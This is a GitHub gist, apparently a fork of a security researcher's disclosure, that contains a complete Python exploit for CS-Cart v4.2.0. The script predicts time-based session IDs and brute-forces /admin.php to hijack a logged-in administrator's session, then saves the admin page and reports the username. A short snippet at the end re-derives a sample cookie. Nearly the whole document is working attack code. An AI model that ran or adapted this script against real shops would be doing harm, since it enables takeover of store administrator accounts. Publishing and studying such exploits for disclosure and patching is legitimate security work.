@rasismeiro
Forked from nikcub/cscart-exploit.py
Created November 21, 2016 14:30

Revisions

  1. @nikcub revised this gist Aug 12, 2014. 1 changed file with 2 additions and 3 deletions.
    5 changes: 2 additions & 3 deletions cscart-exploit.py
    @@ -1,7 +1,6 @@
     #!/usr/bin/env python
    -# CS-Cart session brute force exploit
    -# Nik Cubrilovic - www.nikcub.com
    -# see blog post for explainer
    +# CS-Cart session brute force exploit for v4.2.0
    +# see https://www.nikcub.com/posts/cs-cart-v4-2-0-session-hijacking-and-other-vulnerabilities/

     import sys
     import requests
  2. @nikcub created this gist Jun 9, 2014.
    95 changes: 95 additions & 0 deletions cscart-exploit.py
    @@ -0,0 +1,95 @@
    #!/usr/bin/env python
    # CS-Cart session brute force exploit
    # Nik Cubrilovic - www.nikcub.com
    # see blog post for explainer

    import sys
    import requests
    import argparse
    import re
    import string
    import random
    import hashlib

    from BeautifulSoup import BeautifulSoup

    target_host = "cscart.dev"
    target_ua = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:20.0) Gecko/20100101 Firefox/20.0"
    target_start_time = 1402325013  # Unix timestamp (seconds) of the victim's click on the login link, plus 3-4 seconds for the login to complete
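    # Note: req_generator below tries 100,000 usec values per candidate second,
    # so each second of uncertainty in target_start_time adds 100,000 candidate
    # session IDs (an assumed 10-second window means up to 1,000,000 guesses).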

    # change nothing below.

    session_name = False
    session_value = False
    cookies = {}


    headers = {
        "Host": target_host,
        "User-Agent": target_ua,
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate"
    }


    proxies = None  # e.g. {'http': 'http://127.0.0.1:8080'} to route requests through a proxy
    req_base = 'http://' + target_host
    req_url = req_base + '/admin.php'

    def extract_username(html_doc):
        # pull the signed-in username out of the admin page's dropdown menu
        soup = BeautifulSoup(html_doc)
        menu = soup.find("ul", "dropdown-menu pull-right")
        if menu:
            link = menu.find("li").find("a")
            match = re.search(r'<br />(.*?)</a>', str(link), re.DOTALL)
            if match:
                return match.group(1).strip()
        return 'Not Found'

    def rand_string(n=5):
        return ''.join(random.choice(string.ascii_uppercase + string.digits) for x in range(n))

    def save_doc(tid, txt):
        # dump a copy of the response to a local file for later inspection
        f = open(tid + '_' + rand_string() + '.txt', 'w')
        f.write(txt.encode('ascii', 'ignore'))
        f.close()

    def req_att(path, cookie):
        # unused helper: fetch an admin path with a candidate session cookie
        cookies[session_name] = cookie
        return requests.get(req_base + path, headers=headers, cookies=cookies, allow_redirects=False)

    def calc_session_name(host):
        # the session cookie name is the first 5 hex chars of the md5 of the base URL
        return hashlib.md5(host).hexdigest()[:5]

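    # Candidate session IDs are md5("<time><time as 8 hex digits><usec as 5 hex
    # digits>") plus a literal "_0_A" suffix, presumably mirroring how the target
    # derives session IDs from the request timestamp (see the linked post).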
    def gen_value(basetime, usec):
        return hashlib.md5("%s%08x%05x" % (basetime, basetime, usec)).hexdigest() + "_0_A"

    def req_generator(startat):
        # yield candidate session IDs, walking usec through 0..99,999 for each second
        usec = 0
        while True:
            r = gen_value(startat, usec)
            usec += 1
            if (usec % 10000) == 0:
                # print progress every 10,000 attempts
                print '.'
            if usec >= 100000:
                usec = 0
                startat += 1
            yield r

    session_name = calc_session_name(req_base)

    def fetch(cookie):
        # try one candidate session ID; anything other than a 302 redirect back to
        # the login page means the guess hit a live admin session
        headers['Cookie'] = session_name + '=' + cookie
        try:
            response = requests.request('GET', req_url, headers=headers, proxies=proxies, timeout=30.0, allow_redirects=False)
            if response.status_code != 302:
                print "FOUND: " + session_name + "=" + cookie
                save_doc(target_host + '_' + cookie, "\n".join("%s: %s" % kv for kv in response.headers.items()) + "\n" + response.text)
                print "Wrote file backup"
                print "Signed in as: " + extract_username(response.text)
        except requests.RequestException:
            # ignore timeouts and connection errors and keep guessing
            pass

    # walk candidate session IDs starting from the estimated click time
    for guess in req_generator(target_start_time):
        fetch(guess)
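
As a quick sanity check of the token scheme above, here is a stand-alone sketch that re-derives one cookie name/value pair using only the hashing logic from calc_session_name and gen_value. The host "example.test" and the timestamp/usec values are placeholders, and the .encode() calls are an addition so it also runs on Python 3 (the gist itself is Python 2):

    import hashlib

    req_base = 'http://example.test'  # placeholder target, not from the gist
    cookie_name = hashlib.md5(req_base.encode()).hexdigest()[:5]

    basetime, usec = 1402325013, 4242  # arbitrary illustrative values
    cookie_value = hashlib.md5(
        ("%s%08x%05x" % (basetime, basetime, usec)).encode()
    ).hexdigest() + "_0_A"

    print("Cookie: %s=%s" % (cookie_name, cookie_value))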